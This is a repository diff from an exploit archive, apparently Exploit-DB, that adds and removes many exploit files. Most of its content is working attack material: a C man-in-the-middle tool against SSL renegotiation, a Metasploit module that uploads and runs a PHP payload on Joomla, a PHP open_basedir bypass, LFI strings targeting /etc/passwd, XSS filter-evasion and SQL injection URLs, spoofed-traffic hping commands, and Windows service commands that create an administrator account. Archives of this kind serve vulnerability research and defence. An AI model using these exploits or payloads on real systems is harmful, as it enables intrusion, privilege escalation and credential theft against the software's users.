+++ b/platforms/linux/remote/30043.txt
@ -7,3 +7,6 @@ An attacker can exploit these issues to crash the affected application, effectiv
 Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected. 
 http://www.exploit-db.com/sploits/30043.zip
 CVE: 2007-2788 & 2007-2789
 OSVDB-ID: 36199 & 36200
--- a/platforms/multiple/remote/33399.txt
+++ b/platforms/multiple/remote/33399.txt
@ -0,0 +1,46 @@
 source: http://www.securityfocus.com/bid/37305/info
 Oracle E-Business Suite is prone to multiple authentication-bypass and HTML-injection vulnerabilities.
 Attackers could exploit these issues to steal cookie-based authentication credentials, perform unauthorized actions, or bypass certain security restrictions. Other attacks are also possible.
 Some of these vulnerabilities may be documented in BID 33177 (Oracle January 2009 Critical Patch Update Multiple Vulnerabilities). Reportedly, the HTML-injection and some authentication-bypass vulnerabilities were addressed in the Oracle January 2009 Critical Patch Update. Full details are not currently available. We will update this BID as more information emerges.
 Oracle E-Business Suite 10 and 11 are vulnerable; other versions may also be affected. 
 Authentication bypass:
 http://www.example.com:port/OA_HTML/OA.jsp
 http://www.example.com:port/OA_HTML/RF.jsp
 http://www.example.com:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
 http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
 http://www.example.com:8888/pls/TEST/oracleconfigure.customize?p_page_id=1
 HTML injection:
 http://www.example.com:port/pls/[DADName]/icx_define_pages.editpagelist
 http://www.example.com:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
 http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
 http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=CREATE
 It is important to note that our testing has indicated that different versions have different mitigation levels of this vulnerability, requiring, in some situations, utilizing XSS evasion techniques to overcome certain input validation and sanitation mechanisms:
    * For earlier versions, injecting a simple <SCRIPT> suffices:
      <SCRIPT>alert(<28>XSS')<SCRIPT>
    * Some versions limit the permitted characters, and thus require the tester to inset Java-script without utilizing tags, by injecting a script into the text box as follows:
      ");alert('XSS');//
    * Later versions appear to also enforce server-side length restrictions on the vulnerable parameters. As a result, multiple separate injections are required to achieve script execution, such as:
      ");/*
      */alert/*
      */(/*
      */<2F>XSS'/*
      */);//
--- a/platforms/multiple/remote/9972.c
+++ b/platforms/multiple/remote/9972.c
@ -1,421 +0,0 @@
 #include <errno.h>
 #include <stdio.h>
 #include <string.h>
 #include <unistd.h>
 #include <sys/time.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <arpa/inet.h>
 #include <netdb.h>
 #include <openssl/ssl.h>
 #include <openssl/ssl3.h>
 void
 fail(const char *proc)
 {
  perror(proc);
  exit(1);
 }
 void
 setup_server
    (int *sock, int port)
 {
  struct sockaddr_in sa;
  int s, r, i;
  s = socket(AF_INET, SOCK_STREAM, 0);
  if (s == -1)
    fail("setup_server:socket");
  i = 1;
  r = setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i));
  if (r == -1)
    fail("setup_server:setsockopt(SO_REUSEADDR)");
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_addr.s_addr = INADDR_ANY;
  sa.sin_port = htons(port);
  r = bind(s, (struct sockaddr *) &sa, sizeof(sa));
  if (r == -1)
    fail("setup_server:bind");
  r = listen(s, 5);
  if (r == -1)
    fail("setup_server:listen");
  *sock = s;
 }
 void
 do_accept
    (int *accepted, int sock)
 {
  struct sockaddr_in sa;
  socklen_t sl;
  int s;
  sl = sizeof(sa);
  s = accept(sock, (struct sockaddr *) &sa, &sl);
  if (s == -1)
    fail("do_accept:accept");
  fprintf(stderr, "accepted %s:%d\n",
 	  inet_ntoa(sa.sin_addr), ntohs(sa.sin_port));
  *accepted = s;
 }
 void
 setup_client
    (int *sock, in_addr_t ip, int port)
 {
  struct sockaddr_in sa;
  int s, r;
  s = socket(AF_INET, SOCK_STREAM, 0);
  if (s == -1)
    fail("setup_server:socket");
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_addr.s_addr = ip;
  sa.sin_port = htons(port);
  r = connect(s, (struct sockaddr *) &sa, sizeof(sa));
  if (r == -1)
    fail("setup_client:connect");
  *sock = s;
 }
 int
 xread
    (int fd, unsigned char *buf, size_t len)
 {
  int r, rlen;
  rlen = 0;
  while (len > 0) {
    r = read(fd, buf, len);
    if (r == 0)
      break;
    else if (r == -1)
      return -1;
    buf += r;
    len -= r;
    rlen += r;
  }
  return rlen;
 }
 struct ssl_io_t
 {
  SSL *ssl;
  int fd;
  int raw;
 };
 extern int
 ssl3_read_bytes
    (SSL *s, int type, unsigned char *buf, int len, int peek);
 int
 rec_read
    (struct ssl_io_t *io, unsigned char *buf)
 {
  int r, l;
 #if 0
  fprintf(stderr, "rec read %s\n",
 	  io->raw & 1 ? "raw" : "cooked");
 #endif
  if (io->raw & 1) {
    r = xread(io->fd, buf, 5);
    if (r == 0)
      return 0;
    else if (r != 5)
      fail("rec_read:read1");
    if (buf[0] != 0x80)
      l = (buf[3] << 8) + buf[4];
    else /* ssl2 hack */
      /* fail("rec_read:ssl2"); */
      l = (buf[1]) - 3;
    if (l < 0 || l > (1 << 15)) {
      errno = EINVAL;
      fail("rec_read:reclen");
    }
    r = xread(io->fd, buf + 5, l);
    if (r != l)
      fail("rec_read:read2");
    l += 5;
    return l;
  }
  else {
    r = ssl3_read_bytes(io->ssl, SSL3_RT_HANDSHAKE, buf + 5, 1<<15, 0);
    if (r == 0)
      return 0;
    else if (r < 0) {
      if (io->ssl->s3->change_cipher_spec) {
 	buf[0] = 0x14;
 	buf[1] = (io->ssl->version >> 8);
 	buf[2] = (io->ssl->version & 0xff);
 	buf[3] = 0;
 	buf[4] = 1;
 	buf[5] = 1;
 	io->raw |= 1;
 	io->ssl->s3->change_cipher_spec = 0;
 	return 6;
      }
      fail("rec_read:ssl3_read_bytes");
    }
    l = r;
    buf[0] = io->ssl->s3->rrec.type;
    buf[1] = (io->ssl->version >> 8);
    buf[2] = (io->ssl->version & 0xff);
    buf[3] = (l >> 8);
    buf[4] = (l & 0xff);
    return l + 5;
  }
 }
 extern int
 ssl3_write_bytes
    (SSL *s, int type, const void *buf_, int len);
 void
 rec_write
    (struct ssl_io_t *io, unsigned char *buf, size_t len)
 {
  int r;
 #if 0
  fprintf(stderr, "rec write %s\n",
 	  io->raw & 2 ? "raw" : "cooked");
 #endif
  if (io->raw & 2) {
    r = write(io->fd, buf, len);
    if (r != len)
      fail("rec_write:write");
  }
  else {
    r = ssl3_write_bytes(io->ssl, buf[0], buf + 5, len - 5);
    if (r < 0) {
      fail("rec_read:ssl3_write_bytes");
    }
    if (buf[0] == 0x14) {
      io->raw |= 2;
    }
  }
 }
 void
 ssl_io
    (struct ssl_io_t *assl, struct ssl_io_t *cssl)
 {
  struct ssl_io_t *ssls[2];
  int maxfd, active;
  int i, r, l;
  fd_set rfd;
  unsigned char buf[1 << 16];
  ssls[0] = assl;
  ssls[1] = cssl;
  active = 3;
  maxfd = 0;
  for (i = 0; i < 2; i++)
    if (ssls[i]->fd >= maxfd)
      maxfd = ssls[i]->fd + 1;
  while (active) {
    FD_ZERO(&rfd);
    for (i = 0; i < 2; i++)
      if (active & (1 << i))
 	FD_SET(ssls[i]->fd, &rfd);
    r = select(maxfd, &rfd, NULL, NULL, NULL);
    if (r == -1)
      fail("rec_io:select");
    for (i = 0; i < 2; i++) {
      if (active & (1 << i) && FD_ISSET(ssls[i]->fd, &rfd)) {
 	r = rec_read(ssls[i], buf);
 	if (r == 0) {
 	  shutdown(ssls[i]->fd, SHUT_RD);
 	  shutdown(ssls[1 - i]->fd, SHUT_WR);
 	  active &= ~(1 << i);
 	  continue;
 	}
 	l = r;
 	rec_write(ssls[1 - i], buf, l);
      }
    }
  }
 }
 void
 setup_ssl_ctx
    (SSL_CTX **ctx)
 {
  OpenSSL_add_ssl_algorithms();
  SSL_load_error_strings();
  *ctx = SSL_CTX_new(SSLv3_client_method());
  if (!*ctx)
    fail("setup_ssl_ctx:SSL_CTX_new");
 }
 void
 setup_ssl_io
    (struct ssl_io_t *io, SSL_CTX *ctx, int sock, int raw)
 {
  SSL *ssl;
  BIO *bio;
  ssl = SSL_new(ctx);
  if (!ssl)
    fail("setup_ssl_ctx:SSL_new");
  bio = BIO_new_socket(sock, BIO_NOCLOSE);
  if (!bio)
    fail("setup_ssl_ctx:BIO_new_socket");
  SSL_set_bio(ssl, bio, bio);
  SSL_set_connect_state(ssl);
  io->ssl = ssl;
  io->fd = sock;
  io->raw = raw;
 }
 int
 bogus_change_cipher_state
    (SSL *ssl, int i)
 {
  return 0;
 }
 /* stolen from ssl_locl.h */
 typedef struct ssl3_enc_method {
  int (*enc)(SSL *, int);
  int (*mac)(SSL *, unsigned char *, int);
  int (*setup_key_block)(SSL *);
  int (*generate_master_secret)(SSL *, unsigned char *, unsigned char *, int);
  int (*change_cipher_state)(SSL *, int);
  int (*final_finish_mac)(SSL *, EVP_MD_CTX *, EVP_MD_CTX *, const char *, int, unsigned char *);
  int finish_mac_length;
  int (*cert_verify_mac)(SSL *, EVP_MD_CTX *, unsigned char *);
  const char *client_finished_label;
  int client_finished_label_len;
  const char *server_finished_label;
  int server_finished_label_len;
  int (*alert_value)(int);
 } SSL3_ENC_METHOD;
 #define TRICK "GET /ble HTTP/1.0\r\nX-Blah: "
 void
 hack_ssl
    (struct ssl_io_t *assl, struct ssl_io_t *cssl)
 {
  int r, l;
  unsigned char buf[1 << 16];
  SSL_METHOD *mth;
  r = rec_read(assl, buf);
  if (r <= 0)
    fail("hack_ssl:rec_read:no i/o");
  l = r;
  if (buf[0] == 0x16 && buf[1] == 3 &&
      (buf[2] == 0 || buf[2] == 1)) {
    cssl->raw = 0;
    r = SSL_CTX_set_ssl_version
 	(cssl->ssl->ctx, buf[2] == 0 ?
 	 SSLv3_client_method() : TLSv1_client_method());
    if (r != 1)
      fail("hack_ssl:SSL_CTX_set_ssl_version");
    r = SSL_clear(cssl->ssl);
    if (r != 1)
      fail("hack_ssl:SSL_clear");
    r = SSL_connect(cssl->ssl);
    if (r != 1)
      fail("hack_ssl:SSL_connect");
    /* ssl3_setup_buffers(io->ssl);
       ssl_get_new_session(io->ssl, 0); */
    r = SSL_write(cssl->ssl, TRICK, sizeof(TRICK)-1);
    if (r != sizeof(TRICK)-1)
      fail("hack_ssl:SSL_connect");
    cssl->ssl->in_handshake++;
    cssl->ssl->method->ssl3_enc->change_cipher_state =
 	bogus_change_cipher_state;
  }
  else {
    /* schedule suicide */
    alarm(5);
  }
  rec_write(cssl, buf, l);
 }
 #define HTTP_OK "HTTP/1.0 200 Connected\r\n\r\n"
 void
 handle_http_req
    (int sock, in_addr_t *ip, int *port)
 {
  int r, l, k;
  unsigned char buf[1 << 16];
  char str[100];
  unsigned short num;
  struct hostent *he;
  l = 0;
  for (;;) {
    r = read(sock, buf + l, sizeof(buf)-1 - l);
    if (r <= 0)
      fail("handle_http_req:read");
    for (k = l; r > 0; ++k, --r)
      if (buf[k] != '\r')
        buf[l++] = buf[k];
    if (l >= 2 && buf[l-1] == '\n' && buf[l-2] == '\n')
      break;
    if (l >= sizeof(buf)-1)
      fail("handle_http_req:req too big");
  }
  buf[l] = '\0';
  r = sscanf(buf, "CONNECT %99[0-9A-Za-z.-]:%hu", str, &num);
  if (r != 2)
    fail("handle_http_req:bad request");
  he = gethostbyname(str);
  if (he == NULL || he->h_length != sizeof(in_addr_t))
    fail("handle_http_req:gethostbyname");
  r = write(sock, HTTP_OK, sizeof(HTTP_OK)-1);
  if (r != sizeof(HTTP_OK)-1)
    fail("handle_http_req:write");
  *ip = *(in_addr_t *)(he->h_addr_list[0]);
  *port = num;
 }
 int
 main
    (int argc, const char **argv)
 {
  pid_t pid;
  int ssock, asock, csock;
  SSL_CTX *ctx;
  in_addr_t ip;
  int port;
  struct ssl_io_t assl, cssl;
  setup_ssl_ctx(&ctx);
  setup_server(&ssock, atoi(argv[1]));
  for (;;) {
    do_accept(&asock, ssock);
    pid = fork();
    if (pid == -1)
      fail("main:fork");
    else if (pid == 0) {
      close(ssock);
      handle_http_req(asock, &ip, &port);
      setup_client(&csock, ip, port);
      setup_ssl_io(&assl, ctx, asock, 3);
      setup_ssl_io(&cssl, ctx, csock, 3);
      hack_ssl(&assl, &cssl);
      ssl_io(&assl, &cssl);
      return 0;
    }
    else {
      close(asock);
    }
  }
 }
--- a/platforms/php/webapps/14231.txt
+++ b/platforms/php/webapps/14231.txt
@ -1,26 +0,0 @@
 1               ##########################################             1
 0               I'm Sid3^effects member from Inj3ct0r Team             1
 1               ##########################################             0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 Name : Bs Auto_Classifieds Script(articlesdetails.php) Sqli Vulnerability
 Date : july 5,2010
 Critical Level 	: HIGH
 vendor URL :http://www.brotherscripts.com/
 Price:$24.95
 Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
 special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
 greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz 
 #######################################################################################################
 Description : 
 Setup your own auto classifieds website with BrotherScripts.com. We are offering a top quality auto listings software which allows car buyers to search available autos for free. The auto listings are highly detailed with photos, dealer/person information and driving directions linked to MapQuest.
 Dealers and car sellers can list their properties, too. After a new dealer has registered, he/she is able to select and buy a package depending on how many adverts they want to to post and for the time duration they want to show them. Payments are done via PayPal or 2Checkout. Before expiration of the account the dealer will be informed by sending a few emails - 10 days before the expiration of his account, 5 and 1 days. All dealers' listings are deleted automatically after 24 hours of expiration of his account
 #######################################################################################################
 Xploit :SQli Vulnerability
 DEMO URL :http://server/Auto_Classifieds/articlesdetails.php?id=[sqli]
 ###############################################################################################################
 # 0day no more 
 # Sid3^effects 
--- a/platforms/php/webapps/15462.txt
+++ b/platforms/php/webapps/15462.txt
@ -1,82 +0,0 @@
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 # Exploit Title: Joomla Component com_dcnews LFI Vulnerability
 # Date: 6-11-2010
 # Author: Th3 RDX
 # Software Link: n/a
 # Version: n/a
 # Tested on: online Sites
 # category: webapp/Joomla
 # Code : n/a
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Br0wn Sug4r, Sid3^effects, L0rd CruSad3r,
 Sonic , r0073r(inj3ct0r.com)                  
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 <3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, G00g!3 W@rr!0r, 
 str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                           ......\m/ INDIAN CYBER ARMY \m/......
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 ##############################################################################
 %//
 ----- [ Founder ] -----
        Th3 RDX
 ----- [ E - mail ] -----
    th3rdx@gmail.com
                                                        %\\
 ##############################################################################
 ##############################################################################
 %//
 ----- [Title] -----
 Joomla Component com_dcnews LFI Vulnerability
 ----- [ Vendor ] -----
 n/a
                                                        %\\
 ##############################################################################
 ##############################################################################
 %//
 ----- [ Bug (s) ] -----
 ----- [ Local File Inclusion ] -----
 => [ EXPLOIT ]
 http://server/index.php?option=com_dcnews&view=dcnews&controller=[LFI]
 => [ Example/POC ]
 http://server/index.php?option=com_dcnews&view=dcnews&controller=../../../../../../../../../../etc/passwd%00
                                                    %\\
 ##############################################################################
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam 
 => c0d3 for motherland, h4ck for motherland
 ==> i'm worst than a useless <==
 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
 Bug discovered : 06 November 2010
 finish(0);
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
 #End 0Day#
--- a/platforms/php/webapps/23979.txt
+++ b/platforms/php/webapps/23979.txt
@ -1,5 +0,0 @@
 source: http://www.securityfocus.com/bid/10100/info
 Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
 tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode=[SQL]
--- a/platforms/php/webapps/23980.txt
+++ b/platforms/php/webapps/23980.txt
@ -1,5 +0,0 @@
 source: http://www.securityfocus.com/bid/10100/info
 Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
 tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[SQL]
--- a/platforms/php/webapps/23981.txt
+++ b/platforms/php/webapps/23981.txt
@ -1,5 +0,0 @@
 source: http://www.securityfocus.com/bid/10100/info
 Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload.
 tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[SQL]
--- a/platforms/php/webapps/27720.txt
+++ b/platforms/php/webapps/27720.txt
@ -1,7 +0,0 @@
 source: http://www.securityfocus.com/bid/17643/info
 PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
 An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
 http://www.example.com/template_engine.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C/script%3E
--- a/platforms/php/webapps/28285.txt
+++ b/platforms/php/webapps/28285.txt
@ -1,7 +0,0 @@
 source: http://www.securityfocus.com/bid/19180/info
 The Zyxel Prestige 660H-61 ADSL Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
 An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 http://www.example.com/Forms/rpSysAdmin?a=%3Cscript%3Ealert(&#039;www.eazel.es&#039;)%3C/script%3E
--- a/platforms/php/webapps/32260.txt
+++ b/platforms/php/webapps/32260.txt
@ -1,9 +0,0 @@
 source: http://www.securityfocus.com/bid/30731/info
 Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
 Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
 http://www.example.com/[installdir]/includes/languages/french/account_newsletters.php? language=../../../../../../../../../../../../../etc/passwd%00
--- a/platforms/php/webapps/33396.txt
+++ b/platforms/php/webapps/33396.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/37290/info
 ZeeJobsite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 This issue affects ZeeJobsite 3x; other versions may be vulnerable as well. 
 http://www.example.com/basic_search_result.php?title=<script>alert(/XSS/)</script> 
--- a/platforms/php/webapps/33400.txt
+++ b/platforms/php/webapps/33400.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/37311/info
 Ez Cart is prone to is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 http://www.example.com/index.php?action=showcat&cid=1&sid=[XSS] 
--- a/platforms/php/webapps/9910.rb
+++ b/platforms/php/webapps/9910.rb
@ -1,174 +0,0 @@
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpClient
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'Joomla 1.5.12 TinyBrowser File Upload Code Execution',
 			'Description'    => %q{
 				This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
 				This plugin is not secured in version 1.5.12 of joomla and allows the upload
 				of files on the remote server. 
 				By renaming the uploaded file this vulnerability can be used to upload/execute
 				code on the affected system.
 			},
 			'Author'         => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					['URL', 'http://milw0rm.com/exploits/9296'],
 					['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
 				],
 			'Privileged'     => false,
 			'Payload'        =>
 				{
 					'DisableNops' => true,
 					'Compat'      => 
 						{
 							'ConnectionType' => 'find',
 						},
 					'Space'       => 1024,
 				},
 			'Platform'       => 'php',
 			'Arch'           => ARCH_PHP,
 			'Targets'        => [[ 'Automatic', { }]],
 			'DisclosureDate' => 'July 22 2009',
 			'DefaultTarget'  => 0))
 			register_options(
 				[
 					OptString.new('URI', [true, "Joomla directory path", "/"]),
 				], self.class)
 	end
 	def check
 		res = send_request_raw({
 			'uri'     => datastore['URI'] + '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
 		}, 25)
 		if (res and res.body =~ /flexupload.swf/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe
 	end
 	def retrieve_obfuscation()
 	end
 	def exploit
 		cmd_php = '<?php ' + payload.encoded + '?>'
 		# Generate some random strings
 		cmdscript	= rand_text_alpha_lower(20) 
 		boundary = rand_text_alphanumeric(6)
 		# Static files
 		directory 	= '/images/stories/'
 		tinybrowserpath = '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/'
 		cmdpath 	= directory + cmdscript 
 		# Get obfuscation code (needed to upload files)
 		obfuscation_code = nil
 		res = send_request_raw({
 			'uri'     => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='
 		}, 25)
 		if (res)
 			if(res.body =~ /"obfus", "((\w)+)"\)/)
 				obfuscation_code = $1
 				print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
 			else
 				print_error("Error retrieving obfuscation code!")
 				return
 			end
 		end
 		# Upload shellcode (file ending .ph.p)
 		data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
 		data << "#{cmdscript}.ph.p\r\n--#{boundary}"
 		data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
 		data << "Content-Type: application/octet-stream\r\n\r\n"
 		data << cmd_php
 		data << "\r\n--#{boundary}--"
 		res = send_request_raw({																													
 			'uri'	  => datastore['URI'] + tinybrowserpath + "/upload_file.php?folder=/images/stories/&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
 			'method'  => 'POST',
 			'data'    => data,
 			'headers' =>
 			{
 				'Content-Length' => data.length,
 				'Content-Type'	 => 'multipart/form-data; boundary=' + boundary,
 			}
 		}, 25)
 		if (res and res.body =~ /File Upload Success/)
 			print_status("Successfully uploaded #{cmdscript}.ph.p")
 		else
 			print_error("Error uploading #{cmdscript}.ph.p")
 		end
 		# Complete the upload process (rename file)
 		print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")		
 		res = send_request_raw({
 			'uri'     => datastore['URI'] + tinybrowserpath + 'upload_process.php?folder=/images/stories/&type=file&feid=&filetotal=1'
 		})
 		# Rename the file from .ph.p to .php
 		res = send_request_cgi({
                        'method'    => 'POST',
                        'uri'       => datastore['URI'] + tinybrowserpath + '/edit.php?type=file&folder=',        
                        'vars_post' => 
                        {
                                'actionfile[0]' => "#{cmdscript}.ph.p",
 				'renameext[0]'   => 'p',
 				'renamefile[0]' => "#{cmdscript}.ph",
 				'sortby' => 'name',
 				'sorttype' => 'asc',
 				'showpage' => '0',
 				'action' => 'rename',
 				'commit' => '',
                        }
                }, 10)
 		if (res and res.body =~ /successfully renamed./) 
 			print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
 		else
 			print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
 		end
 		# Finally call the payload
 		print_status("Calling payload: #{cmdscript}.php")
 		res = send_request_raw({
 			'uri'	=> "#{datastore['URI'] }images/stories/#{cmdscript}.php"
 		}, 25)
 	end
 end
--- a/platforms/php/webapps/9960.txt
+++ b/platforms/php/webapps/9960.txt
@ -1,37 +0,0 @@
 Description:
 ------------
 Via this bug , attacker can save a file in path that not allowed in
 open_basedir .
 Reproduce code:
 ---------------
 <?php
 // Author : Sina Yazdanmehr (R3d.W0rm) ; Our Site : http://IrCrash.com
 if(!extension_loaded('pdf')){
   die('pdf extension required .');   
 }else{
    $__PATH = $_GET['p']; /*The path that u want save file in .ex:
 /etc/file.php*/
    $__VALUE = $_GET['v']; /*The text that u want save in file .ex:
 <?php include $_GET[f];?>*/
    if(!isset($__PATH,$__VALUE)){
 die('/expl.php?p=[path_u_want_save_file]/[file_name]&v=[value_u_want_sav
 e_in_file]');
    }
    $__IRCRASH = pdf_new();
    pdf_open_file($__IRCRASH,$__PATH);
    pdf_begin_page($__IRCRASH,612,792);
 pdf_add_note($__IRCRASH,100,650,200,750,$__VALUE,'R3d.W0rm','note',0);
    pdf_end_page($__IRCRASH);
    pdf_close($__IRCRASH);
    pdf_delete($__IRCRASH);
    print('<p>IrCrash Security Team .</p>');
    print('<p>' . $__PATH . "\n"  . 'created .</p>');}
 ?>
 Expected result:
 ----------------
 When attacker run this code , a file in a path that attacker input in
 `p` in url , whith value that attacker input in `v` in url.
--- a/platforms/windows/dos/21916.txt
+++ b/platforms/windows/dos/21916.txt
@ -1,7 +0,0 @@
 source: http://www.securityfocus.com/bid/5917/info
 A weakness has been reported in some PC Firewall packages that could allow remote denial of service attacks. The problem is in the handling of spoofed traffic.
 Under some circumstances, it is possible for remote users to deny service to various sites for users of PC Firewall software. By sending spoofed traffic that could be deemed malicious by the firewall software package, an attacker could effectively limit the sites a system is capable of reaching.
 hping -e 13 -d 2 -s 6000 -p 2140 -2 host1.example.com -c 2 -a host2.example.com
--- a/platforms/windows/dos/21917.txt
+++ b/platforms/windows/dos/21917.txt
@ -1,7 +0,0 @@
 source: http://www.securityfocus.com/bid/5917/info
 A weakness has been reported in some PC Firewall packages that could allow remote denial of service attacks. The problem is in the handling of spoofed traffic.
 Under some circumstances, it is possible for remote users to deny service to various sites for users of PC Firewall software. By sending spoofed traffic that could be deemed malicious by the firewall software package, an attacker could effectively limit the sites a system is capable of reaching.
 hping -e 13 -d 2 -s 6000 -p 2140 -2 host1.example.com -c 2 -a host2.example.com
--- a/platforms/windows/dos/9959.txt
+++ b/platforms/windows/dos/9959.txt
@ -1,25 +0,0 @@
 #######################################################
 #
 # GPG4Win - GNU Privacy Assistant - GPA.EXE - Crash PoC
 # Found By:	Dr_IDE
 # Tested On:	7RC, XPSP3
 # Usage:	Paste this into GPA Clipboard, Verify.
 #
 #######################################################
 '''
 -----BEGIN PGP MESSAGE-----
 Charset: ISO-8859-1
 Version: GnuPG v1.4.9 (GNU/Linux)
 Comment: If you Verify me in Clipboard Mode, I go BOOM!
 Comment: This is the absolute minimum of content to cause the crash
 Comment: Doesn't seem to overwrite anything though, even @ 10000+ chars
 A==
 =B00M
 -----END PGP MESSAGE-----
 '''
 #[pocoftheday.blogspot.com]
--- a/platforms/windows/local/9989.txt
+++ b/platforms/windows/local/9989.txt
@ -1,8 +0,0 @@
 To exploit this issue, attackers require local, interactive access to an affected computer.
 The following example commands are available:
 sc stop "AdobeActiveFileMonitor8.0"
 sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
 sc start "AdobeActiveFileMonitor8.0"
 runas /noprofile /user:%COMPUTERNAME%\adobe cmd